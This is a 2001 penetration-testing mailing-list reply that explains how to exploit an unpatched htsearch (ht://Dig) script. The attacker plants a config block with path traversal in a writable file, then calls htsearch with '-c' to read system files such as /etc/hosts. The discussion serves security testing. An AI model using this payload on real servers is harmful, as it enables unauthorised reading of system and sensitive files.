Penetration Testing mailing list archives
Re: Pen-Testing help (Compaq Insight & htsearch)
From: "rudi carell" <rudicarell () hotmail com>
Date: Tue, 11 Dec 2001 09:20:52
hi,
From: "Tim Russo" <trusso () wireguided com>
2)When I try to exploit the htsearch script I get the following error: "Unable to read word database file '/xxx/xxx/htdig/db/db.words.db' Did you run htmerge?" [xxx are for obscurity] :)
.. if htsearch is not patched and you have write access somewhere on the server (guestbook etc...) you could create entries like:
---cut here--- nothing_found_file: /etc/hosts database_base: ${database_dir}/../../../../../etc/ word_db: ${database_base}hosts doc_index: ${database_base}hosts doc_db: ${database_base}hosts ---cut here--- and then request: ---cut here--- http://host/htsearch?-c+[filelocation] ---cut here--- rc security () freefly com http://www.freefly.com/security/ _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Pen-Testing help (Compaq Insight & htsearch) Tim Russo (Dec 10)
- Re: Pen-Testing help (Compaq Insight & htsearch) Philipp Stucke (Dec 11)
- Re: Pen-Testing help (Compaq Insight & htsearch) warchild (Dec 11)
- <Possible follow-ups>
- RE: Pen-Testing help (Compaq Insight & htsearch) Zwan-van-der.Erwin (Dec 11)
- Re: Pen-Testing help (Compaq Insight & htsearch) rudi carell (Dec 11)